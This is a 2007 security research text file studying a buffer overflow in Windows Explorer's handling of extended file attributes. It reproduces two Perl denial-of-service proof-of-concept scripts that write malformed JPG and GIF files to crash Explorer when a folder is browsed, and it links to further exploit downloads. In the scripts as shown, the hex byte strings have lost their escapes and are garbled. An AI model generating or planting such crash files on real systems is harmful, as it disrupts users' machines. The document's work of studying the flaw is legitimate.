Home / os / win2k

wef-study.txt

Posted on 12 August 2007

########################################################## Windows Extended file attributes buffer overflow Study II ########################################################## In a previous article , i write about extended file attributes: "A local buffer overflow exists in the windows explorer . The extended file atributes functions have a small size of the buffer in 'FileAllInformation(),FileNameInformation' and other subfunctions in Undocumented functions of NTDLL , resulting in a buffer overflow. With a unknow impact." Original article: http://lostmon.blogspot.com/2007/06/ buffer-overflow-in-extended-file.html I Write "this issue could be done in all files"... Now i go to extend some details moore of my investigation and the research of this issue. Look the new vulnerabilities on Microsoft windows GDI and ole32 http://www.securityfocus.com/bid/16167 http://www.securityfocus.com/bid/25207 http://secunia.com/advisories/10020/ http://secunia.com/advisories/10194/ http://osvdb.org/displayvuln.php?osvdb_id=31885 http://osvdb.org/displayvuln.php?osvdb_id=31886 http://osvdb.org/displayvuln.php?osvdb_id=31887 All PoC and all exploits have some details to study. All files wen explorer crash ,crashing wen try to look the extended file atributes of any file (*.jpg,*.doc,*.gif,*.wmf) How to demostrate it ?? All exploits have some similitudes .... all crafted files crashing at the same point or at the same properties this is a litle test/study of those exploits / vulnerabilities ############################################ Testing with filemon and EFA.vbs ############################################ #################### Exploit wmf File #################### Download BID 16167 exploit and unzip it in c: est open filemon and include process explorer.exe and click in apply. now open c: est and wen explorer looks the EFA for the wmf file , crash , or wen put the mouse over... in the filemon wen the crash is done we have some similar to http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_WMF.GIF filemon mark the overflow in 'FileAllInformation()' function. another test with the same file : save EFA_test.vbs and execute it , the windows scripting host crash wen try to look extended attribute number 9 (Author). delete the doc file in a dos command line :) #################### Exploit jpg file #################### Download BID 25207 exploit and unzip it in c: est open filemon and include process explorer.exe and click in apply. now open c: est and wen explorer looks the EFA for the jpg file , crash , or wen put the mouse over... in the filemon wen the crash is done we have some similar to http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_jpg.GIF filemon mark the overflow in 'FileAllInformation()' function. another test with the same file : save EFA_test.vbs and execute it , the windows scripting host crash wen try to look extended attribute number 9 (Author). delete the doc file in a dos command line :) ################### exploit Gif file ################### save exploit for Gif file in c: est open filemon and include process explorer.exe and click in apply. now open c: est and wen explorer looks the EFA for the gif file , crash , or wen put the mouse over... in the filemon wen the crash is done we have some similar to http://usuarios.lycos.es/reyfuss/xss/images/explorer/log_art.GIF filemon mark the overflow in 'FileAllInformation()' function. another test with the same file : save EFA_test.vbs and execute it , the windows scripting host crash wen try to look extended attribute number 9 (Author). delete the doc file in a dos command line :) ################### Exploit Doc file ################### unzip the explorer_crasher.doc in c: est\nopen filemon and include process explorer.exe and click in apply. now open c: est and wen explorer looks the EFA for the doc file , crash , or wen put the mouse over... in the filemon wen the crash is done we have some similar to IMAGEN DEL DOC filemon mark the overflow in 'FileAllInformation()' function. another test with the same file : save EFA_test.vbs and execute it , the windows scripting host crash wen try to look extended attribute number 9 (Author). delete the doc file in a dos command line :) ################################# LINKS AND FILES NEEDED ################################# For testing this you need all exploits , filemon and EFA.vbs. Download filemon : http://www.microsoft.com/technet/ sysinternals/FileAndDisk/Filemon.mspx Download Exploit Word file DoS : http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar Download exploit BID 16167: http://www.securityfocus.com/data/ vulnerabilities/exploits/WMF-DoS.rar Exploit BID 25207 : ######################################################## #!/usr/bin/perl #Bug found and ExpLoitEd by CrazyAngel # Greets: st0rke, Elite, P0uya_s3rv3r, Aria # ThnX ALL Shabgard.Org Members Specially Moderators and Clans print " JPG PoC denial of service exploit by CrazyAngel "; print " generating something.jpg..."; open(JPG, ">./something.jpg") or die "cannot create jpg file "; print JPG "x01x00x09x00x00x03x22x00x00x00x72x65x7Ax61x2Ex65"; print JPG "x78x45x07x00x00x00xFCx02x00x00x00x00x00x00x00x00"; print JPG "x08x00x00x00xFAx02x00x00x00x00x00x00x00x00x00x00"; print JPG "x07x00x00x00xFCx02x08x00x00x00x00x00x00x80x03x00"; print JPG "x00x00x00x00"; close(JPG); print "ok now try to browse folder in XP explorer and wait :) "; #################################################################### Save Gif file gdi32.dll DoS : ############################################################### #!/usr/bin/perl ############################################################### # Bug Found By ::DeltahackingTEAM ## # Coded By Reza.Yavari (Dr.Pantagon) ## #Web Site::Www.Deltahacking.net And Www.DeltaSecurity.ir And Www.PersianWhois.com ## #Free Upload :: Www.Persianupload.com And Www.Persianupload.net ## #Email: Dr.Pantagon [A]Deltasecurity.ir ## # We Are::Dr.Trojan,Hiv++,D_7j,Dr.Pantagon,Impostor,Lord,Vpc,And....All Mem print " GIF PoC denial of service exploit by Dr.Pantagon < Dr.Pantagon@deltasecurity.ir>"; print " generating Art.gif..."; print " Usage :"; print " 1- Mouse Over Art.gif For Excute Exploit "; print " 2- Single Click Art.gif For Excute Exploit "; print " 3- Double Clik Art.gif (Open) For Excute Exploit "; print " 4- More... "; print " You Can open Art.gif Or Select Art.gif(Single Click) Or Delete Art.gif For Run(Excute) Exploit"; open(gif, ">./Art.gif") or die "cannot create gif file "; print gif "x02x00x09x00x00x03x22x00x00x00x6x7x6x6x6x64"; print gif "x2Dx49x07x00x00x00xFCx02x00x00x00x00x00x00x00x00"; print gif "x08x00x00x00xFAx02x00x00x00x00x00x00x00x00x00x00"; print gif "x07x00x00x00xFCx02x08x00x00x00x00x00x00x80x03x00"; print gif "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"; print gif "x9bx99x86xd1x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x95x99x99x99x99x99x99x99x98x99x99x99"; print gif "x99x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99xdaxd4xddxb7xdcxc1xdcx99x99x99x99x99"; print gif "x89x99x99x99x99x99x99x99x99x99x99x99x99x99"; print gif "x99x99x99x99x99x99x90x90x90x90x90x90x90x90"; print gif "x02x00x09x00x00x03x22x00x00x00x6x7x6x6x6x64"; print gif "x2Dx49x07x00x00x00xFCx02x00x00x00x00x00x00x00x00"; print gif "x08x00x00x00xFAx02x00x00x00x00x00x00x00x00x00x00"; print gif "x07x00x00x00xFCx02x08x00x00x00x00x00x00x80x03x00"; print gif "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"; close(gif); print "ok ok Gif Exploit Creat and run exploit and wait :) "; # milw0rm.com [2007-07-23] #################################################################### Save EFA_test.vbs: ####################### EFA_test.vbs ######################## Dim arrHeaders(35) Set objShell = CreateObject("Shell.Application") Set objFolder = objShell.Namespace("C: est") For i = 0 to 34 arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i) Next For Each strFileName in objFolder.Items For i = 0 to 34 Wscript.Echo i & vbtab & arrHeaders(i) _ & ": " & objFolder.GetDetailsOf(strFileName, i) Next Next ######################################################### ########################

 

TOP